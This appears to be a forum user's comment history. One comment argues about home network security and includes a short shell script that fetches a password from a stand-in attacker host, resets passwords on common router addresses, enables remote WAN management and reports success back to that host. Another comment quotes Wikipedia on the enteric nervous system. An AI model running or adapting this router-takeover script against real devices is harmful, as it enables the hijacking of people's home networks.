• 0 Posts
  • 15 Comments
Joined 3 years ago
cake
Cake day: June 10th, 2023

help-circle












  • That’s what I said though, it only protects you from the very most basic of mindless scripts. Obviously ARP/NDP makes it pointless for anything more complicated than…

    newpass="$(curl "https://bad.guy/get_pass_for_pub_ip")"
    for a in '192.168.1.1' '192.168.0.1' '10.0.0.1'; do
        curl -q "http://${a}/reset_password.cgi?&password=password&new_password=${newpass}" 2>/dev/null && \
        curl -q "http://${a}/remote_management.cgi?&password=${newpass}&wan_enable=1" && \
        curl -q "https://bad.guy/success?addr=%24%7Ba%7D"
    done
    

    …completely pointless. If it’s a someone inside your network, you need more.



  • Not just your stomach, but your entire digestive system actually. It’s called the enteric nervous system, and it’s absolutely fascinating (the disfunction of which has recently been linked to a lot of different diseases and disorders). From Wikipedia:

    The enteric nervous system (ENS) is one of the three divisions of the autonomic nervous system (ANS), the others being the sympathetic nervous system (SNS) and parasympathetic nervous system (PSNS). The ENS is formed from the myenteric plexus, and the submucosal plexus, and consists of a mesh-like system of neurons that governs the functions of the gastrointestinal tract, including motility and secretion, and is known as the “second brain”.

    The enteric nervous system is capable of operating independently of the brain and spinal cord

    The enteric nervous system in humans consists of some 500 million neurons, 0.5% of the number of neurons in the brain, five times as many as the one hundred million neurons in the human spinal cord, and about ⅔ as many as in the whole nervous system of a cat. The enteric nervous system is embedded in the lining of the gastrointestinal system, beginning in the esophagus and extending down to the anus.